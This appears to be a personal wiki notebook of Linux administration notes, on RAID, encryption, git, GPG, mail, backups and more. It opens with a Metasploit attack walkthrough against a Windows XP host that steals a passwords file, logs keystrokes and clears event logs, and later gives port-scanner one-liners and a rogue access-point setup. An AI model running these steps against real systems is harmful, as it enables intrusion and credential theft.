+nmap -A 192.168.100.42   // winxp sp3
+}}}
+! 3. Hacking and Exploitation
+{{{
+msfconsole 
+use exploit/windows/smb/ms04_011_lsass
+set PAYLOAD windows/meterpreter/bind_tcp
+set RHOST 192.168.100.2
+exploit // geschafft!
+
+// schauen was es so gibt auf dem Computer
+cd "../../Documents and Settings/Administrator/My Documents"
+cat passwoerter.txt
+download passwoerter.txt
+
+//Keylogger
+keyscan_start
+// Eingabe credentials in Messenger
+keyscan_dump
+keyscan_stop
+}}}
+! 4. Privilege Escalation
+{{{
+ps 			// finde explorer.exe PID
+migrate PID 	// Schadcode in Prozess verstecken, 
+// dessen Rechte und Eigenschaften annehmen (Zugriff auf Grafische Oberflaeche)
+
+execute -f calc   // nur "Taschenrechner" ausfuehren, kann aber alles sein
+screenshot  	// image von Desktop
+
+set RHOST 192.168.100.1 // gepatchtes Windows
+}}}
+!5. Covering Tracks
+{{{
+// auch noch rootkits/backdoors pflanzen fuer spaeteren zugriff
+clearev
+// ausweitung des angriffs auf weitere computer im netzwerk
+shutdown
+}}}

! cool Tools
+qmv - qewl graphical win
+rlwrap - linewrapper
+!! parallel stuff
+{{{
+seq -w 19 |
+    parallel wget http://hackermonthly.com/xmas/hackermonthly-issue0{}.zip
+wget -P4 -n1 http://hackermonthly.com/xmas/hackermonthly-issue0{01..19}.zip
+}}}
+

! Firmware Update
+http://www.siliconimage.com/support/searchresults.aspx?pid=28&cat=15
+take 
+{{{BIOS Update Utility for DOS}}}
+and :
+{{{SiI3114 IDE, SATARAID5 and system BIOS}}}
+!! In Freedos
+{{{
+updflash b5403.bin -a -d -v -ID3114 -u 
+}}}
+For non-raid Mode
+

Knowledge Base

see [[HDD encryption]]
+! Tweaks
+If Raid is slow, try
+{{{
+echo 16384 | sudo tee /sys/block/md<X>/md/stripe_cache_size
+}}}
+If this works
+{{{
+cat >/etc/udev/rules.d/60-md-stripe-cache.rules <<EOF
+SUBSYSTEM=="block", KERNEL=="md*", ACTION=="change", TEST=="md/stripe_cache_size", ATTR{md/stripe_cache_size}="16384"
+EOF
+}}}

* [[HDD encryption]]
+* [[habanero]]
+* [[cygwin]]
+* [[Fahrrad]]
+* [[Network Boot]]
+* [[Amazon Web Service]]
+* [[Dropbox]]
+* [[UbuntuOne]]
+* [[firefox]]
+* [[mysql]]
+* [[Anschriften]]
+* [[einkaufen]]
+* [[vhosts]]
+* [[Dealextreme]]
+* [[CSS]]
+* [[evdev]]

! Installation
+!! ubuntu 12.04
+{{{
+aptitude install g++ python-pip python-dev
+pip install twisted pyasn1
+pip install allmydata-tahoe
+}}}

{{{
+#!/bin/bash
+if ! [ "$1" ];
+then
+    echo "no pixelsize set"
+    exit 1
+fi
+#printf '\33]50;%s%d\007' "xft:Terminus:pixelsize=" $1
+}}}

!Basic Sample
+{{{
+from Tkinter import *
+
+class App(Frame):
+    def say_hi(self):
+        print "hi"
+
+    def createWidgets(self):
+        self.QUIT = Button(self)
+        self.QUIT['text'] = 'aidsballs'
+        self.QUIT['fg'] = 'red'
+        self.QUIT['command'] = self.quit
+        self.QUIT.pack({'side' : 'left'})
+
+        self.hi= Button(self)
+        self.hi['text'] = 'hi'
+        self.hi['command'] = self.say_hi
+        self.hi.pack({'side' : 'left'})
+    def __init__(self,master=None):
+        Frame.__init__(self,master)
+        self.pack()
+        self.createWidgets()
+
+root = Tk()
+app = App(master=root)
+app.mainloop()
+root.destroy()
+}}}
+!Grid Layout
+{{{
+from Tkinter import *
+a = Frame(root)
+frame.columnconfigure(0,weight=1) # make the column 0 stretchy horizontally
+frame.rowconfigure(0,weight=1) # make row 0 stretchy vertically
+b = Label(a,text='bob')
+b.grid(row=0,column=0,sticky=N+S+W) # stretch out vertically and be alligned at the left side
+}}}

! filesystem
+!! /etc/fstab
+add discard to options
+{{{
+/dev/mapper/main-root	/         	ext4      	rw,noatime,discard	0 1
+}}}
+! LUKS
+!! grub with crypto-root
+in {{{/etc/default/grub}}}
+{{{
+GRUB_CMDLINE_LINUX="init=/usr/lib/systemd/systemd cryptdevice=/dev/sda2:main:allow-discards elevator=noop"
+}}}
+!! cryptsetup
+{{{
+cryptsetup luksOpen --allow-discards /dev/sdx main
+}}}
+! LVM
+!! /etc/lvm/lvm.conf
+{{{
+#enable
+issue_discards
+}}}
+! manual trim
+{{{
+fstrim -v <mountpoint>
+}}}

! internet forwarding
+see [[Network Boot]] for DHCP Daemon configuration
+{{{
+#!/bin/bash
+
+device=ppp0
+#DHCP-Serverstarten
+/etc/rc.d/dhcpd restart
+
+
+echo 1 > /proc/sys/net/ipv4/ip_forward
+echo 1 > /proc/sys/net/ipv4/ip_dynaddr
+
+iptables -A POSTROUTING -t nat -o $device -j MASQUERADE
+
+#iptables -A INPUT -m state --state NEW,INVALID -i $device -j DROP
+#iptables -A FORWARD -m state --state NEW,INVALID -i $device -j DROP
+}}}

- to use with [[Duply]]
+{{{
+wget http://people.canonical.com/~roman.yepishev/us/ubuntuone-sso-login.py
+# source: http://people.canonical.com/~roman.yepishev/us/src/
+pacman -S python2-oauth
+python2 ubuntuone-sso-login.py
+# add oauth=.... to .duply/one/conf 
+}}}

! Home-Grown Port Scanner
+!! Bash
+{{{
+HOST=127.0.0.1;for((port=1;port<=65535;++port));do echo -en "$port ";if exec 5<>/dev/tcp/$HOST/$port 2>/dev/null;then echo -en "\n\nport $port/tcp is open\n\n";fi;done
+HOST=127.0.0.1;for p in {0..65535};do((bash -c "(>/dev/tcp/$HOST/$p)" 2> /dev/null && echo open: $p)&read -t0.1;kill $! 2>/dev/null)2>/dev/null;done
+}}}
+!! Shell + Telnet
+also see http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/
+{{{
+HOST=127.0.0.1;for((port=1;port<=65535;++port));do echo -en "$port ";if echo -en "open $HOST $port\nlogout\quit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null;then echo -en "\n\nport $port/tcp is open\n\n";fi;done
+}}}
+!! Perl
+{{{
+use strict;
+use IO::Socket;
+my ($target,$remote,$results,$port,@ports);
+unless (@ARGV > 0) { die "usage: $0 [ip]" }
+$target = shift(@ARGV);
+for ($port = 0; $port<65536; $port++)
+{
+    $remote = IO::Socket::INET->new(
+                        Proto    => "tcp",
+                        PeerAddr => $target,
+                        PeerPort => $port,
+                    );
+    if ($remote) {print  "$port is open\n" };
+}
+}}}

! Default route via SSH
+see more https://wiki.archlinux.org/index.php/VPN_over_SSH#OpenSSH.27s_built_in_tunneling
+!! using pvpn
+!!! prepreqs
+{{{
+GNU/Linux
+OpenSSH
+pppd
+bash
+iproute2
+dnsutils (dig(1))
+asciidoc
+(make)
+(binutils)
+}}}
+
+!!! server side
+{{{
+echo "PermitTunnel yes"  >> /etc/ssh/sshd_config
+# deploy client pubkey for root
+echo "PermitRootLogin without-password" >> /etc/ssh/sshd_config
+echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
+echo "iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE" >> /etc/rc.local
+}}}
+!!! client side
+{{{
+yaourt -S pvpn
+ssh-copy-id root@host
+pvpn -t ssh-3  root@host default
+}}}

Watch out for alignment:
+do
+http://www.linuxconfig.org/linux-wd-ears-advanced-format
+
+{{{$ fdisk -H 32 -S 32 /dev/sdx}}}
+{{{
+n
+p
+1
+
+w
+}}}
+! spindown
+use the wdtool to set the spindown time to something more sane than 5 seconds with the freedos bootcd. For older disks use:
+
+{{{
+hdparm -S 80 /dev/sdx
+}}}

!fancy tools
+{{{
+xev
+setxkbmap en
+xlock -mode blank
+}}}
+!xmodmap
+!! switch mod1 and mod4
+
+{{{
+clear mod1 
+clear mod4
+add mod1 = Super_L Super_R Hyper_L
+add mod4 = Alt_L Meta_L
+}}}
+-- Umlauts --
+!! multi key for umlauts
+
+keycode 108 = Multi_key 
+
+gives :
+Alt-" + u = ü
+Alt-s + s = ß

! Set up Access Point
+{{{
+T0$ sysctl net.ipv4.ip_forward=1
+T0$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+T0$ airbase-ng -c 5 wlan1
+T0$ ifconfig at0 192.168.0.1 up && dnsmasq -d 
+}}}

! /etc/apt/mirror.list
+{{{
+
+deb http://ftp.de.debian.org/debian squeeze main  non-free contrib
+}}}

! basic install
+{{{
+# we are using gpt, not mbr
+gdisk /dev/sda   
+# create a 2MB grub (EF02) partition and the rest as linux partition(8200)
+# ... and btrfs because all the cool kids do so
+mkfs.btrfs /dev/sda2
+mkdir /mnt/btrfs-root /mnt/active
+mount /dev/sda2 /mnt/btrfs-root
+btrfs subvolume create __active && cd __active
+for i in home var usr ; do btrfs subvolume create $i; done
+mount /dev/sda2 default,noatime,subvol=__active /mnt/active
+
+# install that shit
+pacstrap /mnt/active base
+genfstab -p /mnt/active > /mnt/active/etc/fstab
+cat >> /mnt/active/etc/fstab<<EOF
+tmpfs /tmp tmpfs defaults 0 0
+## to never write persistent, uncomment:
+#tmpfs /var/log tmpfs defaults 0 0
+EOF
+arch-chroot /mnt/active
+ln -s /usr/share/zoneinfo/Europe/Berlin /etc/localtime
+echo "LANG=en_US.UTF-8" >> /etc/locale.conf
+echo "en_US.UTF-8 UTF-8" >> /etc/locale.gen
+locale-gen
+echo "my-host" > /etc/hostname
+mkinitcpio -p linux
+pacman -S openssh grub-bios
+grub-mkconfig -o /boot/grub/grub.cfg
+passwd
+# useradd -d /home/bob -m bob
+cd /etc/netctl
+cp examples/ethernet-static lan
+# edit lan , try network: enp0s25 or something
+netctl enable lan
+systemctl enable sshd.service
+grub-install /dev/sda
+exit
+reboot
+}}}

To generate a daily report of every user to login to the machine, the following command could be run from cron :
+{{{aureport -l -i -ts yesterday -te today}}}
+To review all audited activity for unusual behavior, a good place to start is to see a summary of which audit rules have been triggering:
+{{{aureport --key --summary}}}
+If access violations stand out, review them with:
+{{{ausearch --key access --raw | aureport --file --summary}}}
+To review what executables are doing:
+{{{ausearch --key access --raw | aureport -x --summary}}}
+If access violations have been occurring on a particular file (such as /etc/shadow)
+{{{ausearch --key access --file /etc/shadow --raw | aureport --user --summary -i}}}

! Automounting
+!! /etc/auto.master
+{{{
+/media/auto  /etc/auto.media --timeout=30 --ghost
+}}}
+/media/auto will be mounted over (do not use full folders).
+{{{--ghost}}} keeps the mount Folders if unused
+!! in /etc/auto.media
+at first {{{blkid -o list | grep your-disk}}}
+{{{
+[name]         -fstype=[vfat],other-options        :/dev/disk/by-uuid/[your-id]
+}}}

!custom hotkeys
+find out the buttons you need with [[xev]], then
+{{{
+    awful.key({ }, "XF86AudioPlay",            function () awful.util.spawn("mpc toggle")  end),
+    awful.key({ }, "XF86AudioStop",            function () awful.util.spawn("mpc stop")    end),
+    awful.key({ }, "XF86AudioNext",            function () awful.util.spawn("mpc next")  end),
+    awful.key({ }, "XF86AudioPrev",            function () awful.util.spawn("mpc prev")  end),
+    awful.key({ }, "XF86AudioLowerVolume",     function () awful.util.spawn("amixer set Master 5%-")  end),
+    awful.key({ }, "XF86AudioRaiseVolume",     function () awful.util.spawn("amixer set Master 5%+")  end),
+    awful.key({ }, "XF86AudioMute",            function () awful.util.spawn("amixer set Master toggle")  end),
+    awful.key({ }, "XF86HomePage",             function () awful.util.spawn("chromium")  end),
+}}}
+under globalkeys entry. also see [[Logitech G15]]

!Code Snippets
+!! Yes/No Input 
+{{{
+read -n1 -p "Install foo? (y/n) " #read one character
+[[ $REPLY = [yY] ]] && echo sudo aptitude install foo || { echo "You didn't answer yes, or installation failed."; exit 1; }
+}}}
+!! Run if not yet started
+{{{
+pidof $TOOL >& /dev/null
+if [ $? -ne 0 ]; then
+  $TOOL &
+fi
+}}}
+!! Bash Case
+{{{
+case expression in
+    pattern1)
+        statements ;;
+    *) # match the rest
+        statements ;;
+esac
+}}}
+!! history stats
+{{{
+ cat ~/.histfile | awk '{a[$1]++}END{for(i in a){print a[i] " " i}}' | sort -rn | head
+}}}
+
+!! check if group exists
+{{{
+getent group vboxusers &> /dev/null || groupadd -f -g 108 vboxusers
+}}}
+!! check if binary exists
+{{{
+[[ -x =git ]] || pacman -S git
+#or
+which git || exit 1
+}}}
+!! delete files oder than X Days
+{{{
+find /path/to/folder/ -mtime +X -exec rm {} \;
+}}}
+!! exec self with sudo
+{{{
+exec sudo "$0" "$@"
+}}}

!Beagleboard Mx
+http://www.watterott.com/de/BeagleBoard-xM

! installation
+{{{
+pacman -S btrfs btrfs-progs
+}}}
+! hints
+see https://btrfs.wiki.kernel.org/index.php/UseCases
+{{{
+# mount real root
+mount -osubvol=/ <fs> <mount>
+mount -osubvolid=0 <fs> <mount>
+# copy via cow:
+alias cp='cp --reflink=always'
+# mount degraded
+mount -odegraded /<fs> <mount>
+# real used size
+btrfs fi df <mount>
+# raid1 for data and meta (default: meta -> mirrored, data -> striped)
+mkfs.btrfs -m raid1 -d raid1 <fs1> <fs2>
+# jbod (no striping)
+mkfs.btrfs -d single <fs1> <fs2>
+# scan shit
+btrfs dev scan
+# re-balance after disk add
+btrfs dev add <fs> <mount>
+btrfs fi balance <mount>
+# convert current fs
+btrfs balance start -dconvert=raid1 -mconvert=raid1 <mount>
+# remove failed device
+btrfs dev delete missing <mount>
+}}}
+! snapshots
+!! create
+
+!! Roll back
+

! initial installation
+{{{
+#?/bin/sh   
+# something like this
+
+useradd ci
+punani install python-virtualenv 
+su ci
+virtualenv buildbot
+echo ". $HOME/buildbot/bin/activate" >~/.bashrc
+pip install buildbot-slave buildbot
+buildbot create-master master
+# cp master.conf master/master.conf
+buildbot reconf master
+# or reconfigure as many slaves as you wish
+buildslave create-slave slave localhost "ubuntu1204-local-slave" aidsballs
+buildbot start master
+buildslave start slave
+
+}}}

! spoof host_name
+{{{
+curl --resolve host:80:ip host
+}}}

! Run rxvt from Context Menu
+{{{
+REGEDIT4
+[HKEY_CLASSES_ROOT\Directory\shell\rxvt] 
+@="rxv&t Here" 
+
+[HKEY_CLASSES_ROOT\Directory\shell\rxvt\command] 
+@="C:\\cygwin\\bin\\rxvt.exe -bg black -fg white -sr -sl 1000 -fn \"Fixedsys\" -ls -e /usr/bin/zsh --login -c \"cd '%1'; exec /bin/zsh \"" 
+
+[HKEY_CLASSES_ROOT\Drive\shell\rxvt] 
+@="rxv&t Here" 
+
+[HKEY_CLASSES_ROOT\Drive\shell\rxvt\command] 
+@="C:\\cygwin\\bin\\rxvt.exe -bg black -fg white -sr -sl 1000 -fn \"Fixedsys\" -ls -e /usr/bin/zsh --login -c \"cd '%1'; exec /bin/zsh \""
+}}}
+
+! Using git+ssh through proxy
+1. Get corkscrew 
+{{{
+export http_proxy=http://g2netcache.alcatel.fr:3128/
+export HTTP_PROXY=$http_proxy
+wget http://ftp.uni-kl.de/pub/windows/cygwin/release/corkscrew/corkscrew-2.0-1.tar.bz2
+tar xf corkscrew*
+cp usr/bin/corkscrew.exe ~/bin
+}}}
+2. update git config
+{{{
+echo "export GIT_SSH=~/bin/myssh" >> ~/.zshrc
+echo 'exec ssh -F ~/.ssh/config "$@"' >> ~/bin/myssh
+}}}
+3. update ssh config file
+{{{
+cat >> ~/.ssh/config << EOF
+Host leechi
+    User makefu
+    HostName leechi.kicks-ass.org
+    Port 443
+    ProxyCommand corkscrew g2netcache.alcatel.fr 3128 %h %p
+EOF
+}}}
+4. work the magic
+{{{
+git clone leechi:auto.git
+}}}

{{{
+auto gre1
+iface gre1 inet tunnel
+  mode gre
+  netmask 255.255.255.255
+  address -ask crest-
+  dstaddr -ask crest-
+  endpoint -crest endpoint-
+  local -local ip-
+  ttl 255
+
+}}}

!Incremental Backups
+{{{
+dump 0uf /path/to/backup.dump /mountpoint
+# wait some time
+dump 1uf /path/to/backup1.dump /mountpoint
+# something is b0rken
+cd /mountpoint
+restore rf /path/to/backup.dump
+restore rf /path/to/backup1.dump
+}}}
+! Restore single files
+{{{
+restore if /path/to/backup.dump
+}}}
+!Test it
+{{{
+
+dd if=/dev/zero of=virtualfs bs=1024 count=30720
+losetup /dev/loop0 virtualfs
+$ mkfs.ext3 /dev/loop0
+...
+$ mount /dev/loop0 /mnt
+...
+$ cd mnt;touch help ; touch me
+$ dump 0uf /loop.dump /mnt # erstelle vollbackup
+...
+$ touch /mnt/khan
+$ dump 1uf /loop1.dump /mnt # erstelle inkrementelles backup
+...
+$ rm /mnt/*
+$ ls /mnt
+[empty]
+$ cd /mnt
+$ restore rf ../loop.dump #vollbackup zurueckspielen
+$ restore rf ../loop1.dump #inkrementelles backup zurueckspielen
+$ ls /mnt
+help 
+khan 
+me
+}}}

! GPG 
+Generate: 
+{{{
+gpg --gen-key
+}}}
+As signkey use Secret key and encryption key the Pubkey
+Export: 
+{{{
+gpg --export -a root@pigstarter.de > pigstarter.pub
+gpg --export-secret-keys -a root@pigstarter.de > pigstarter.key
+}}}
+Import: 
+{{{
+gpg --import < pigstarter.pub
+gpg --import-secret-keys < pigstarter.key
+}}}
+! Sample Duplicity
+{{{
+duplicity --exclude-filelist /exclude rsync://volume-8694@rsync.hidrive.strato.com/users/volume-8694/euer --encrypt-key= --sign-key=
+}}}
+! Restore
+{{{
+duplicity restore  --encrypt-key= rsync://volume-8694@rsync.hidrive.strato.com/users/volume-8694/euer /home/euer
+}}}

! Focalprice
+FPCUS10OFF - 10 % off

! Python
+{{{
+from evdev import InputDevice,categorize
+from select import select
+
+dev = InputDevice('/dev/input/by-path/pci-0000:00:1a.0-usb-0:1.2:1.0-event-mouse')
+print (dev)
+dev.grab()
+while True:
+   r,w,x = select([dev], [], [])
+   for event in dev.read():
+       print(categorize(event))
+}}}

!Install
+!!Debian
+{{{
+apt-get install exim4
+dpkg-reconfigure exim4-config
+}}}

! grab mjpg_streamer
+{{{
+ffmpeg -f mjpeg -i http://lazorcam.shack/\?action\=stream  -vcodec mpeg4 video_file.avi
+}}}

{{{
+busybox httpd
+python3 -m http.server
+python2 -m SimpleHTTPServer
+twistd -n web --port=8080 --path=.
+}}}

! cache to tmp
+in {{{about:config}}}
+{{{
+browser.cache.disk.parent_directory = /tmp
+}}}
+! search in url bar
+in {{{about:config}}}
+{{{
+keyword.URL = http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=
+}}}

! join pdfs
+ghostscript
+
+{{{ gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf file1.pdf file2.pdf }}}
+

! tips'n'tricks
+!! exclude all files currently not checked or staged
+{{{
+git ls-files --others >> .git/infos/exclude
+}}}
+!! merge another repo into the current one
+{{{
+git clone newrepourl
+[[move the files around to fit the repo to merge into]]
+cd /path/to/oldrepo
+git remote add newrepo /path/to/newrepo
+git fetch newrepo
+git merge newrepo/master
+}}}
+!! ignore file mode changes
+{{{
+git config core.filemode false
+}}}
+! Git HTTP Server via apache
+server side:
+{{{
+#apache webdav:
+Alias /repos "/var/git/"
+
+<Directory "/var/git">
+    Options Indexes FollowSymLinks
+    DAV on
+    allowOverride all
+    Order allow,deny
+    allow from all
+</Directory>
+}}}
+in /var/git
+{{{
+mkdir bla.git
+git init --bare
+# .htaccess :
+AuthType Basic
+AuthName "Git"
+AuthUserFile .ht-auth-file
+Require valid-user
+}}}
+#
+{{{
+htpasswd .ht-auth-file USER
+chmod +rwx .ht*
+chown -R http:http *
+chmod -R 777 *  # i have no idea but it seems to work, make sure no new files are being created 
+}}}
+! check in history of other repo into current
+{{{
+git pull /path/to/other/repo other-repo
+git checkout other-repo
+git log (look for latest commit of other-repo) 
+git reset  --hard 'last-commit-of-other-repo' or git reset --hard 
+                remotes/other-repo
+# do integration magic
+git checkout master
+git merge other-repo
+}}}
+! have a clean checkout of a bare repository with git hooks
+{{{
+git init /home/autosync/autosync
+}}}
+in {{{bare-repo/hooks/post-upate}}}
+{{{
+#!/bin/sh
+cd /home/autosync/autosync/ || exit
+unset GIT_DIR
+git pull origin master | logger
+}}}
+

!basics
+#edit .gnupg/options
+{{{
+keyserver
+#  wwwkeys.pgp.net
+#  search.keyserver.net
+#  pgp.ai.mit.edu
+}}}
+!! Get Keys and stuff
+{{{
+gpg --recv-keys 0x[hash]
+
+gpg --list-keys 
+
+# get fingerprint, check with user
+gpg --fingerprint [name]
+gpg --sign-key [name]
+
+gpg --edit-key [name]
+# type "trust"
+}}}
+! Sign File
+{{{
+#produces a file.asc
+gpg --clearsign FILE
+
+#checks validity
+gpg --verify FILE.asc
+}}}
+! encryption
+{{{
+gpg --encrypt --armor FILE
+
+gpg --decrypt ENCRYPTED/FILE
+}}}
+

!Anbau
+Frische habanero, Kerne rauskratzen. In 50% Torf und Kakteenerde. Knapp unter der Erde. Freucht halten. In Flaches behaeltnis, Frischhaltefolie drueber. 
+bei 5 cm . Holzspiess, rausheben, umtopfen.

!installation
+{{{
+apt-get install honeyd gawk
+}}}
+

! Auditing
+audit files in /var/.audit
+{{{
+audisp -e login /var/.audit/audtrail
+}}}
+find network ip-addr
+{{{
+netstat -in
+ifconfig lanX
+}}}

! Arch Linux
+{{{
+iptables -F
+iptables -P FORWARD DROP
+iptables -P INPUT DROP
+iptables -P OUTPUT ACCEPT
+iptables -A INPUT -p tcp --dport 1655 -j ACCEPT
+iptables -A INPUT -i lo -j ACCEPT
+iptables-save >/etc/iptables/iptables.rules
+systemctl enable iptables.service
+}}}

! get every entry in scope
+{{{ldapsearch -H "ldap://justitia.jura.uni-tuebingen.de" -b o=Jura -x}}}
+
+! get base ( o=... )
+{{{ldapsearch -H "ldap://justitia.jura.uni-tuebingen.de" -b "" -s base -x}}}
+

! Change Colors
+{{{
+change colors for files:
+
+dircolors -p > .dircolors
+#edit colorfile
+
+#in .someShellrc
+if [ -f "$HOME/.dircolors" ] ; then
+  eval `dircolors -b "$HOME/.dircolors"`
+  export LS_COLORS
+fi
+}}}
+without "eval"
+{{{
+dircolors -p > dircolors.txt
+vim dircolors.txt
+dircolors -b ~/dircolors.txt >> .zshrc
+}}}

Mausezahn is a fast traffic generator written in C which allows you to send nearly every possible and impossible packet. 
+! Documentation
+website: http://www.perihel.at/sec/mz/
+Docu path: /usr/share/doc/mz
+! DNSSec

! PicUntu on mk808
+!! burn finless custom image (+root)
+YOU WILL NEED **WINDOWS** FOR THAT
+* grab from  http://www.freaktab.com/showthread.php?3857-NEW-MK808-quot-all-models-quot-Finless-1-7 your image
+* Power off android -> hold button under 'not led' pinhole -> power on -> unknown device in windows
+* Install Driver in finless /driver folder
+* Finless ROM Flash Tool 
+-> Choose as Recovery : http://code.google.com/p/rk3066-linux/
+-> Flash ROM
+!! install the linux image
+! Get Wifi Working
+{{{echo "bcm40181" > /etc/modules}}} or {{{modprobe bcm40181}}}
+!! iwlist scan
+... is not working, use the following
+{{{
+
+echo "ctrl_interface=/var/run/wpa_supplicant" > /etc/wpa.conf
+wpa_supplicant -i eth0 -c /etc/wpa.conf -B
+wpa_cli scan
+sleep 5
+wpa_cli scan_results
+}}}

! config
+in {{{/etc/mpd.conf}}}, there is a great sample config file, fit that one for your needs. 
+!! Sample config
+{{{/usr/share/mpd/mpd.conf.example}}}
+!! Quick config
+{{{
+music_directory       "/home/user/music"         # Your music dir.
+playlist_directory    "/var/lib/mpd/playlists"
+db_file               "/var/lib/mpd/mpd.db"
+log_file              "/var/log/mpd/mpd.log"
+pid_file              "/var/run/mpd/mpd.pid"
+state_file            "/var/lib/mpd/mpdstate"
+mixer_type          "software" # independent volume
+}}}
+! fixing "Alsa device Busy"
+in {{{/etc/mpd.conf}}}
+{{{
+audio_output {
+        type                    "alsa"
+        name                    "Sound Card"
+        options                 "dev=dmixer"
+        device                  "plug:dmix"
+}
+}}}
+! update database
+{{{
+mpc update
+}}}
+! Clients
+Check out following clients
+* mpc (old school)
+* ncmpcpp (hot shit)

!webcam
+{{{
+mplayer tv:// -tv driver=v4l2:width=320
+}}}

! Install
+{{{
+aptitude install msmtp-mta
+# pacman -S msmtp-mta
+}}}
+! Configure
+in /etc/msmtprc
+{{{
+defaults
+tls on
+tls_starttls on
+tls_trust_file /etc/ssl/certs/ca-certificates.crt
+
+account default
+host smtp.gmail.com
+port 587
+auth on
+user username@gmail.com
+password mypass
+from username@gmail.com
+logfile /var/log/msmtp.log
+}}}
+chmod 600 /etc/msmtprc

! html view
+in .mailcap
+{{{
+text/html;w3m -dump '%s' -O utf-8 -I %{charset} ; copiousoutput; description=HTML Text; nametemplate=%s.html
+}}}
+in .muttrc
+{{{
+auto_view text/html
+}}}
+! smime
+{{{
+echo "source /usr/share/doc/mutt/samples/smime.rc" >> ~/.muttrc
+smime_keys init
+wget http://services.support.alcatel-lucent.com/PKI/rootCA.crt
+smime_keys add_root rootCA.crt
+
+# create private CA and derive mail certificate (see below)
+#  OR 
+# get free trusted Certificate from http://www.comodo.com/home/email-security/free-email-certificate.php
+
+smime_keys add_p12 mail.p12
+echo 'set smime_default_key="<see output above>"' >> ~/.muttrc
+
+mutt
+# receive signed mail of crypto partner
+## CTRL-K
+#fix the ~/.smime/certificates/.index as extraction of complete chains does not work correctly as of today (31.01.2012) see Mutt #3559
+}}}
+!! Create own CA
+{{{
+mkdir ca
+openssl req -new -x509 -keyout ca/rooty.key -out ca/root.pem -days 9001
+openssl rsa -in ca/rooty.key > ca/root.key
+rm ca/rooty.key
+cat > root.cnf <<EOF
+[ ca ]
+default_ca = ca_default
+[ ca_default ]
+dir = ./ca
+certs = $dir
+new_certs_dir = $dir/ca.db.certs
+database = $dir/ca.db.index
+serial = $dir/ca.db.serial
+RANDFILE = $dir/ca.db.rand
+certificate = $dir/ca.crt
+private_key = $dir/ca.key
+default_days = 365
+default_crl_days = 30
+default_md = md5
+preserve = no
+policy = generic_policy
+[ generic_policy ]
+countryName = optional
+stateOrProvinceName = optional
+localityName = optional
+organizationName = optional
+organizationalUnitName = optional
+commonName = supplied
+emailAddress = optional
+EOF
+
+echo '100001' >ca/ca.db.serial
+touch ./ca/ca.db.index
+mkdir ./ca/ca.db.certs
+
+openssl req -new -keyout mail.key -out mail.csr -days 9001
+openssl ca -config root.cnf -out mail.crt -infiles mail.csr
+openssl pkcs12 -export -inkey mail.key -certfile ca/root.crt -out mail.p12 -in mail.crt
+
+smime_keys add_root ca/root.crt
+smime_keys add_cert ca/root.crt
+# add private certificate
+
+}}}
+
+! [[offlineimap]]

! change root pass
+{{{
+mysqladmin -u root password NEWPASSWORD
+}}}
+! mysql testing
+{{{
+map -p 3306 1.2.3.4 --script mysql-audit \
+--script-args "mysql-audit.filename='nselib/data/mysql-cis.audit'\
+,mysql-audit.username='root',mysql-audit.password='foobar'"
+}}}

! POST and PRE commands
+in {{{ /etc/network.d/interfaces/$INTERFACE }}}
+{{{
+POST_DOWN="pkill dropbox; echo 'Killed Dropbox'"
+POST_UP="sleep 5;sudo -u makefu dropboxd&"
+}}}
+

{{{netstat -tulpn}}}

! share data
+network-address/subnet
+{{{
+echo "/share 192.168.0.0/24(ro,async)">>/etc/exports
+exportfs -ar
+/etc/rc.d/nfs-server restart
+}}}
+! mount data
+{{{
+mount -t nfs 192.168.0.1:/share /mnt
+}}}
+
+! using for virtualbox behind nat
+you will need the "insecure" flag!
+{{{
+/home/makefu/repos/harden *(rw,sync,no_subtree_check,all_squash,anonuid=1000,anongid=1000,insecure)
+}}}

! quirks
+{{{
+nmap script smtp-open-relay.nse --script-args smtp-open-relay.domain=gmail.com -p 25,465,587 <host>
+}}}

{{{
+git clone --depth 1 https://github.com/joyent/node.git
+cd node
+export JOBS=2 # optional, sets number of parallel commands.
+mkdir ~/local
+./configure --prefix=$HOME/local/node
+make
+make install
+export PATH=$HOME/local/node/bin:$PATH
+
+# npm
+curl http://npmjs.org/install.sh | sh
+}}}

! .offlineimaprc
+!! Mailbox names
+required for mutt:
+{{{
+[mbnames]
+enabled= yes
+filename= ~/.mutt/muttrc.mailboxes
+header = "mailboxes 
+peritem = =%(foldername)s
+sep = " "
+footer = "\n"
+}}}
+in {{{.muttrc}}} append {{{source $HOME/.mutt/muttrc.mailboxes}}}

!Infos
+!! Single Instance Virtual Machine Installation
+https://uksysadmin.wordpress.com/2011/02/17/running-openstack-under-virtualbox-a-complete-guide/
+This guide has some problems with authenticating the new repository and adding the public key
+
+! Multi Instance 
+http://docs.openstack.org/openstack-compute/admin/content/ch03.html
+
+! troubleshooting
+{{{
+ echo net.ipv4.ip_forward >> /etc/sysctl.cfg
+}}}
+!! look in /var/log/libvirt/
+

Certificates, verificaten and Stuff
+
+! get ssl fingerprint
+{{{
+echo Q |openssl s_client -connect syntax-fehler.de:993 > out.pem
+# edit out.pem , remove everything outside of ----BEGIN and ---END
+openssl x509 -in out.pem -sha1 -noout -fingerprint
+}}}

! Yaourt mirror
+in {{{/etc/pacman.conf}}}
+{{{
+[archlinuxfr] 
+Server = http://repo.archlinux.fr/$arch
+SigLevel = Optional TrustAll
+}}}
+!! local mirror
+exclude file for rsync: {{{/path/to/exclude.txt}}}
+{{{
+iso
+testing
+
+#Exclude i686 Packages
+*/os/i686
+pool/*/*-i686.pkg.tar.xz
+pool/*/*-i686.pkg.tar.gz
+
+#Exclude x86_64 Packages
+*/os/x86_64
+pool/*/*-x86_64.pkg.tar.xz
+pool/*/*-x86_64.pkg.tar.gz
+}}}
+!! Use rsync
+{{{
+rsync --exclude-from=$EXCLUDE_FILE -rtlHq --delete-after rsync://path/to/repo /path/to/lopcal/repo
+}}}
+! Creating a mirror
+{{{
+#!/bin/bash
+set -x
+# Configuration
+SOURCE='rsync://ftp5.gwdg.de/pub/linux/archlinux/'
+DEST='/srv/mirrors/archlinux'
+EXCLUDE_FILE='/path/to/exclude.txt'
+BW_LIMIT='500'
+REPOS='core extra community'
+RSYNC_OPTS='-rtlHq --delete-after --delay-updates --copy-links --safe-links --max-delete=1000 --bwlimit=500 --delete-excluded'
+LCK_FLE=/tmp/rsync-mirror.lck'
+
